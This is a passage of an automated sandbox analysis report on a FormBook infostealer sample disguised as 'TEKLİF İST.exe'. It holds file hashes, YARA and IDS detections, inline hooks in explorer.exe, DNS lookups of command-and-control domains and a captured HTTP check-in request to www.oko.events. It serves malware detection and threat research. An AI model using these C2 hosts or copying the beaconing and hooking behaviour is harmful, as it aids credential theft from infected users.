                                                                                                            www.oko.eventsRFQ 245801.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 185.26.122.70
                                                                                                            hbwebdownload - MT 103.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 185.26.122.70
                                                                                                            docs.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 185.26.122.70
                                                                                                            Dekont.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 185.26.122.70
                                                                                                            Quotation #10091.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 185.26.122.70
                                                                                                            PAGO_200924.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 185.26.122.70

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            HOSTLANDRUhbwebdownload - MT 103.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 185.26.122.70
                                                                                                            docs.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 185.26.122.70
                                                                                                            Dekont.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 185.26.122.70
                                                                                                            Wave.exeGet hashmaliciousDiscord Token Stealer, Orcus, SugarDumpBrowse
                                                                                                            • 185.37.62.158
                                                                                                            DFpUKTL6kg.exeGet hashmaliciousDCRatBrowse
                                                                                                            • 185.26.122.81
                                                                                                            http://mydpd.space/Get hashmaliciousDCRat, PureLog StealerBrowse
                                                                                                            • 185.26.122.30
                                                                                                            HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeGet hashmaliciousDCRatBrowse
                                                                                                            • 185.26.122.79
                                                                                                            yk2Eh24FDd.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 185.26.122.81
                                                                                                            hT0xyYJthf.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 185.26.122.81
                                                                                                            https://hideuri.com/EXWJgmGet hashmaliciousUnknownBrowse
                                                                                                            • 185.26.122.79

                                                                                                            JA3 Fingerprints

                                                                                                            No context

                                                                                                            Dropped Files

                                                                                                            No context

                                                                                                            Created / dropped Files

                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TEKL#U0130F #U0130ST.exe.log

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1216
                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                            Malicious:true
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):2232
                                                                                                            Entropy (8bit):5.379460230152629
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//Z+Uyus:fLHyIFKL3IZ2KRH9OugIs
                                                                                                            MD5:20F0CD8CB676A3CFD7FEBA208EB2D8A8
                                                                                                            SHA1:BE4D606BA8093E8B6F7FB2940FA86175228072CA
                                                                                                            SHA-256:40A3192A587B2F17788D0EA113062BA264F23C6D1A9C3F09ECCB1E5EB52D7596
                                                                                                            SHA-512:AA04A44877E89603F1F3AF1A35C9CFA491C1532C5EF8780AE17861325C123686F38E778CCB57EF0D6973CB327A12A4AEC101420F460232CA1C084A259F07F498
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gr01wwlr.fro.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqs2e3jc.x4i.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oburudgp.g3k.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ub515qa1.jg1.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Entropy (8bit):7.5831063423984535
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                            File name:TEKL#U0130F #U0130ST.exe
                                                                                                            File size:743'936 bytes
                                                                                                            MD5:88153ac6837f5034a7ab44259c90f4dd
                                                                                                            SHA1:90085bacffa3b6a75252f9e06af2d7ac54886e75
                                                                                                            SHA256:23bc8acbb8a1e716512ac2ea9426d3fc46938cccac426f344c0314aafb17769e
                                                                                                            SHA512:fc5fa3bc1ad16fa3e1e8988253da0479b9235c7d051d82cde50e3da6ca95acff6d20483b4dc52778015f2344cc1edca68e9b184f8f507479b3ada5bf594be8cc
                                                                                                            SSDEEP:12288:MOX2iRzjEZ3eBNdQ6LN5LD8MYoSrwb+dpXeboencW3:MOmYzwIBDRjLHY7rhXeDncW3
                                                                                                            TLSH:2FF49CC03A363B29DE7857F58A19DCB103B51968B405FAE25EDE77C73489B11AA08F43
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>.)g..............0..P...........o... ........@.. ....................................@................................

                                                                                                            File Icon

                                                                                                            Icon Hash:00928e8e8686b000

                                                                                                            Static PE Info

                                                                                                            General

                                                                                                            Entrypoint:0x4b6fe6
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x6729CF3E [Tue Nov 5 07:54:38 2024 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                            Entrypoint Preview

                                                                                                            Instruction
                                                                                                            jmp dword ptr [00402000h]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al

                                                                                                            Data Directories

                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xb6f940x4f.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xb80000x5ec.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000xc.reloc
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xb3e880x54.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                            Sections

                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x20000xb4fec0xb50008c50279a95550a3c4f0ebd91e38af0a0False0.8186439809219613data7.59023926160002IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                            .rsrc0xb80000x5ec0x600e84f8ddefc7f2c052d03e1754b03a32fFalse0.427734375data4.179397032457229IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .reloc0xba0000xc0x2008a4284c71495e81775e5401a68e3b916False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                            Resources

                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            RT_VERSION0xb80900x35cdata0.4127906976744186
                                                                                                            RT_MANIFEST0xb83fc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                            Imports

                                                                                                            DLLImport
                                                                                                            mscoree.dll_CorExeMain

                                                                                                            Network Behavior

                                                                                                            Suricata IDS Alerts

                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2024-11-05T12:28:47.553120+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.849712TCP
                                                                                                            2024-11-05T12:29:25.966033+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.849717TCP
                                                                                                            2024-11-05T12:29:47.524742+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.849784185.26.122.7080TCP
                                                                                                            2024-11-05T12:29:47.524742+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.849784185.26.122.7080TCP
                                                                                                            2024-11-05T12:29:47.524742+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.849784185.26.122.7080TCP

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Nov 5, 2024 12:29:46.896998882 CET4978480192.168.2.8185.26.122.70
                                                                                                            Nov 5, 2024 12:29:46.901932955 CET8049784185.26.122.70192.168.2.8
                                                                                                            Nov 5, 2024 12:29:46.901983976 CET4978480192.168.2.8185.26.122.70
                                                                                                            Nov 5, 2024 12:29:46.902084112 CET4978480192.168.2.8185.26.122.70
                                                                                                            Nov 5, 2024 12:29:46.906986952 CET8049784185.26.122.70192.168.2.8
                                                                                                            Nov 5, 2024 12:29:47.396303892 CET4978480192.168.2.8185.26.122.70
                                                                                                            Nov 5, 2024 12:29:47.448157072 CET8049784185.26.122.70192.168.2.8
                                                                                                            Nov 5, 2024 12:29:47.524643898 CET8049784185.26.122.70192.168.2.8
                                                                                                            Nov 5, 2024 12:29:47.524741888 CET4978480192.168.2.8185.26.122.70

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Nov 5, 2024 12:29:07.412823915 CET6073453192.168.2.81.1.1.1
                                                                                                            Nov 5, 2024 12:29:07.421602964 CET53607341.1.1.1192.168.2.8
                                                                                                            Nov 5, 2024 12:29:27.162455082 CET5503053192.168.2.81.1.1.1
                                                                                                            Nov 5, 2024 12:29:27.184720993 CET53550301.1.1.1192.168.2.8
                                                                                                            Nov 5, 2024 12:29:46.803442001 CET6096353192.168.2.81.1.1.1
                                                                                                            Nov 5, 2024 12:29:46.896394968 CET53609631.1.1.1192.168.2.8
                                                                                                            Nov 5, 2024 12:30:07.506525040 CET5298853192.168.2.81.1.1.1
                                                                                                            Nov 5, 2024 12:30:07.528722048 CET53529881.1.1.1192.168.2.8
                                                                                                            Nov 5, 2024 12:30:28.273245096 CET5582453192.168.2.81.1.1.1
                                                                                                            Nov 5, 2024 12:30:28.295892000 CET53558241.1.1.1192.168.2.8
                                                                                                            Nov 5, 2024 12:30:49.693866014 CET5473253192.168.2.81.1.1.1
                                                                                                            Nov 5, 2024 12:30:49.709728003 CET53547321.1.1.1192.168.2.8

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Nov 5, 2024 12:29:07.412823915 CET192.168.2.81.1.1.10xd467Standard query (0)www.2ar1.shopA (IP address)IN (0x0001)false
                                                                                                            Nov 5, 2024 12:29:27.162455082 CET192.168.2.81.1.1.10x6b35Standard query (0)www.obs-for-seniors-39582.bondA (IP address)IN (0x0001)false
                                                                                                            Nov 5, 2024 12:29:46.803442001 CET192.168.2.81.1.1.10x3d8bStandard query (0)www.oko.eventsA (IP address)IN (0x0001)false
                                                                                                            Nov 5, 2024 12:30:07.506525040 CET192.168.2.81.1.1.10x8dcdStandard query (0)www.aming-chair-83359.bondA (IP address)IN (0x0001)false
                                                                                                            Nov 5, 2024 12:30:28.273245096 CET192.168.2.81.1.1.10xa067Standard query (0)www.refabricated-homes-74404.bondA (IP address)IN (0x0001)false
                                                                                                            Nov 5, 2024 12:30:49.693866014 CET192.168.2.81.1.1.10x35e8Standard query (0)www.nline-degree-6987776.worldA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Nov 5, 2024 12:29:07.421602964 CET1.1.1.1192.168.2.80xd467Name error (3)www.2ar1.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                            Nov 5, 2024 12:29:27.184720993 CET1.1.1.1192.168.2.80x6b35Name error (3)www.obs-for-seniors-39582.bondnonenoneA (IP address)IN (0x0001)false
                                                                                                            Nov 5, 2024 12:29:46.896394968 CET1.1.1.1192.168.2.80x3d8bNo error (0)www.oko.events185.26.122.70A (IP address)IN (0x0001)false
                                                                                                            Nov 5, 2024 12:30:07.528722048 CET1.1.1.1192.168.2.80x8dcdName error (3)www.aming-chair-83359.bondnonenoneA (IP address)IN (0x0001)false
                                                                                                            Nov 5, 2024 12:30:28.295892000 CET1.1.1.1192.168.2.80xa067Name error (3)www.refabricated-homes-74404.bondnonenoneA (IP address)IN (0x0001)false
                                                                                                            Nov 5, 2024 12:30:49.709728003 CET1.1.1.1192.168.2.80x35e8Name error (3)www.nline-degree-6987776.worldnonenoneA (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • www.oko.events

                                                                                                            HTTP Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.849784185.26.122.70804084C:\Windows\explorer.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 5, 2024 12:29:46.902084112 CET163OUTGET /bc01/?DbJ=2d9T+7THaWc2iPFPh4rF72vVDn7gh6g8QCASy1echoulKxCIJZpqtWLObH0Tqfvq8jqw&P2J=ejoHnvmXAnKhhd HTTP/1.1
                                                                                                            Host: www.oko.events
                                                                                                            Connection: close
                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                            Data Ascii:


                                                                                                            Code Manipulations

                                                                                                            User Modules

                                                                                                            Hook Summary

                                                                                                            Function NameHook TypeActive in Processes
                                                                                                            PeekMessageAINLINEexplorer.exe
                                                                                                            PeekMessageWINLINEexplorer.exe
                                                                                                            GetMessageWINLINEexplorer.exe
                                                                                                            GetMessageAINLINEexplorer.exe

                                                                                                            Processes

                                                                                                            Process: explorer.exe, Module: user32.dll
                                                                                                            Function NameHook TypeNew Data
                                                                                                            PeekMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE5
                                                                                                            PeekMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE5
                                                                                                            GetMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE5
                                                                                                            GetMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE5

                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:0
                                                                                                            Start time:06:28:27
                                                                                                            Start date:05/11/2024
                                                                                                            Path:C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"
                                                                                                            Imagebase:0xbe0000
                                                                                                            File size:743'936 bytes
                                                                                                            MD5 hash:88153AC6837F5034A7AB44259C90F4DD
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:3
                                                                                                            Start time:06:28:28
                                                                                                            Start date:05/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):true
